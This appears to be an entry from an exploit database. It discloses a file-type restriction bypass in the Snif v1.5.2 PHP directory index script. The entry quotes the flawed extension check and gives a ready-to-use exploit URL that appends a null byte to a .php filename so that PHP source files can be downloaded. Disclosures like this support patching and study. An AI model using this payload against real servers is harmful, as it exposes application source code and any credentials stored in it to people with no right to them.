[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Snif v1.5.2 - Any Filetype Download Exploit

Author
Aodrulez
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10749
Category
web applications
Date add
01-02-2010
Platform
unsorted
===========================================
Snif v1.5.2 - Any Filetype Download Exploit
===========================================

--------------------------------------------
-: Snif - "Any Filetype" Download Exploit :-
--------------------------------------------
 
Script   : Snif - (Simple And Nice Index File)
Version  : 1.5.2 (possibly lower versions too)

Vulnerability:
--------------
 
Some Default Settings are:
 
$hiddenFilesWildcards = Array("*.php", "*~");
$allowPHPDownloads = false;
 
The first option will prevent any php file
from being listed in the directory listing.
Second one will prevent download of files
with ".php" extension.
 
Even with these options set,we can still
download php files....due to the following
vulnerable code:-
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if ($_GET["download"]!="") {
     
 $download = stripslashes($_GET["download"]);
 $filename = safeDirectory($path.rawurldecode($download));
 if (
    !file_exists($filename)
    OR fileIsHidden($filename)
    OR (substr(strtolower($filename), -4)==".php" AND !$allowPHPDownloads)) {
         
         
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
The last line in the above code checks the
file's extension to make sure its not a php
file.This line of code is Vulnerable though
 
Exploit:
--------
 
Lets say the script is located here:
http://www.a.com/snif.php
 
The following url will bypass all restrictions
and let you download a php file :-
 
http://www.a.com/snif.php?download=snif.php%00



#  0day.today [2024-12-26]  #